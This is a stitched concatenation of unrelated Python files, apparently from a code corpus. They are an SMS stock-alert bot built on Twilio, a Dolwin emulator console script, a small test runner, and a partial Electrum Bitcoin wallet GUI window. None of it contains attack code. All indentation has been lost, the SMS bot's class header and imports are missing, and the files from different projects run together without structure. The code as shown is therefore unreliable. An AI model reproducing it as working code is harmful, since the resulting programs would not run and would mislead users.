TWILIO_ACCOUNT_SID_PAID = ''
TWILIO_AUTH_TOKEN_PAID = ''
TWILIO_NUMBER_PAID = "+"
TWILIO_ACCOUNT_SID_TRIAL = ''
TWILIO_AUTH_TOKEN_TRIAL = ''
TWILIO_NUMBER_TRIAL = "+"
def __init__(self, sms_receiver_phone="+"):
self.sms_receiver_phone = sms_receiver_phone
self.processing_received_sms = []
# [{"from_number": "+1000000", "ticker": "aapl", "target_price": "1.3"},{"from_number": "+1000000", "ticker": "aal", "target_price": "3"}]
def keep_processing_symbol_price_sms_command(self):
while True:
time.sleep(1)
for sms_data in self.processing_received_sms:
from_number = sms_data["from_number"]
ticker = sms_data["ticker"]
target_price = sms_data["target_price"]
# Compare these data with the corresponding ticker prices
# When float(actual_price)<=float(target_price) then
self.sms_handler.send_message(to=from_number, body=f"{ticker} has reached {target_price}!",
on_send_message_listener=self.user_command_sms_sent)
def user_command_sms_sent(self, sid, to, body):
"""
auto called when send sms requested is queued in twilio
:param sid:
:param to:
:param body:
:return:
"""
pass
def sms_received(self, sid="", from_number="", body=""):
"""
This function is called when we receive a message from allowed number
:param sid:
:param from_number:
:param body:
:return:
"""
print(sid) # Already deleted from twilio
print(from_number)
print(body)
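        # Expected body format: "<ticker> <target_price>", e.g. "aapl 1.3" (values illustrative)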
msg = body.strip().split(" ")
if len(msg) == 2:
ticker = msg[0]
target_price = msg[1]
self.processing_received_sms.append(
{"from_number": from_number, "ticker": ticker, "target_price": target_price})
def start_now(self):
"""
Starts the bot immediately
:return:
"""
        # Use self (class attributes) rather than the module-level 'bot' name so this works for any instance
        self.sms_handler = SmsHandler(twilio_sid=self.TWILIO_ACCOUNT_SID_TRIAL,
                                      twilio_auth_token=self.TWILIO_AUTH_TOKEN_TRIAL,
                                      owned_phone_number=self.TWILIO_NUMBER_TRIAL,
                                      allowed_sender_phone=self.TWILIO_NUMBER_PAID)
        self.sms_handler.wait_for_inbound_sms(on_received_sms_listener=self.sms_received, refresh_after=2)
def start(self, start_time_iso="now", start_date_iso="", count_24_hr_at_iso_time="15:59:59"):
"""
ALL OF THE TIME AND DATES MUST BE OF America/New_York Time zone
Starts the bot at "start_time_iso" in a new thread
:param start_time_iso: "now" or "hr:m:s" 24hr format. If "now", then start_date_iso is skipped
""
:param start_date_iso: "" or "Y-m-d" the date of the start_time_iso
:param count_24_hr_at_iso_time: A day completes at this specific time. Considered as valid time
:return:
"""
self.day_end_at = count_24_hr_at_iso_time.strip()
if start_time_iso.lower() == "now":
t1 = Thread(target=self.start_now)
t1.start()
else:
time_date = CustomTimeZone() # Time zone is America/New_York by default
curr_time, curr_date = time_date.get_current_iso_time_date_tuple()
curr_year, curr_month, curr_day = curr_date.strip().split("-")
curr_hr, curr_min, curr_sec = curr_time.strip().split(":")
start_year, start_month, start_day = start_date_iso.strip().split("-")
start_hr, start_min, start_sec = start_time_iso.strip().split(":")
start_at = datetime(year=int(start_year), month=int(start_month), day=int(start_day), hour=int(start_hr),
minute=int(start_min), second=int(start_sec))
curr_time_date = datetime(year=int(curr_year), month=int(curr_month), day=int(curr_day), hour=int(curr_hr),
minute=int(curr_min), second=int(curr_sec))
remaining_seconds = (start_at - curr_time_date).total_seconds()
print(f"Bot will start at {start_date_iso} {start_time_iso}")
print(f"A day will be completed at {count_24_hr_at_iso_time}")
print(f"Sleeping for {remaining_seconds} seconds")
time.sleep(remaining_seconds)
t1 = Thread(target=self.start_now)
t1.start()
def stop(self):
"""
Stops the bot
:return:
"""
if __name__ == "__main__":
bot = SmsBot()
bot.start(start_time_iso="now")
|
dolwin.py
|
# Main script to start the emulator
import os
import sys
import time
import threading
import msvcrt
from jdi import JdiClient
dolwin = None
exitDebugThread = False
autorunScript = None
'''
Entry point. Create an instance for communicating with JDI, load the specified
file, start the polling thread for debug messages and wait for a command/quit.
'''
def Main(file):
global dolwin
global exitDebugThread
dolwin = JdiClient("DolwinEmuForPlayground.dll")
print ("Dolwin Python, emulator version: " + dolwin.GetVersion())
print ("Press any key to enter command or Esc to quit...\n")
dolwin.Execute("load " + file)
dolwin.Execute("run")
debugThread = threading.Thread(target=DebugThread)
debugThread.start()
RunAutorun()
while True:
ch = msvcrt.getch()
if ch == b'\x1b': # Esc
break
try:
cmdline = input("(dolwin) ")
if cmdline != "":
if cmdline[0] == '%':
ExecuteCustomCommand(cmdline.split(' ')[1:])
else:
dolwin.Execute(cmdline)
except Exception as e:
print(e)
exitDebugThread = True
dolwin.Execute("unload")
print ("\nThank you for flying Dolwin airlines!")
'''
Debug messages polling thread
'''
def DebugThread():
while exitDebugThread == False:
msgs = dolwin.QueryDebugMessages()
        for msg in msgs:
            print (msg)
time.sleep(0.1)
'''
Execute external script as custom command
'''
def ExecuteCustomCommand(args):
try:
module = __import__("Scripts." + args[0], fromlist=['object'])
module.do_command (dolwin, args[1:])
except Exception as e:
print(e)
'''
Run autorun after emulation started
'''
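# Illustrative autorun file format (script name is an example): '#' lines are comments,
# '%' lines invoke a script from Scripts/, anything else is sent to JDI as-is, e.g.
#   # my autorun
#   %somescript arg1
#   run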
def RunAutorun():
if not autorunScript:
return
with open(autorunScript, "r") as f:
for line in f:
cmdline = line.replace("\n", "")
if not cmdline:
continue
if cmdline[0] == '#':
continue
if cmdline[0] == '%':
ExecuteCustomCommand(cmdline.split(' ')[1:])
else:
dolwin.Execute(cmdline)
if __name__ == '__main__':
if (len(sys.argv) < 2):
print ("Use: py -3 dolwin.py <file> [autorun.txt]")
else:
if len(sys.argv) >= 3:
autorunScript = sys.argv[2]
Main(sys.argv[1])
|
test.py
|
from multiprocessing import Process
def test_segment():
from app import segmentation
segmentation.main("..\\UBIRIS_200_150\\CLASSES_400_300_Part1")
def test_sr():
from app import upscale
upscale.main("test\\upscale\\hr")
def test_classifier():
from app import classifier
classifier.main("test\\upscale\\sr")
def test():
p1 = Process(target=test_segment)
p1.start()
p1.join()
p2 = Process(target=test_sr)
p2.start()
p2.join()
p3 = Process(target=test_classifier)
p3.start()
p3.join()
if __name__ == '__main__':
test()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum import keystore, simple_config, ecc
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum import constants
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet, AddTransactionException, CannotBumpFee
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
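        # The remaining tabs are optional; each is added only when its
        # 'show_<name>_tab' config key is set (see add_optional_tab below).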
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
        QMessageBox.about(self, "Electrum",
            _("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
            _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
            _("Uses icons from the Icons8 icon pack (icons8.com)."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
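    # Show desktop notifications for incoming transactions. If three or more
    # are pending, they are collapsed into a single summary notification to
    # avoid spamming the user.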
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
            else:
                # Iterate over a copy, since items are removed while notifying.
                for tx in list(self.tx_notifications):
                    if tx:
                        self.tx_notifications.remove(tx)
                        is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
                        if v > 0:
                            self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
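    # Keep a BTC amount edit and its fiat counterpart in sync: editing either
    # field recomputes the other from the current exchange rate, and the
    # auto-filled field is shown in blue. If a fee edit is supplied, changing
    # the fiat field also triggers window.update_fee().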
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
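    # Refresh the status bar: balance text (with optional fiat value), tray
    # tooltip, and the network status icon (offline / synchronizing / lagging /
    # connected, with a proxy variant).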
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
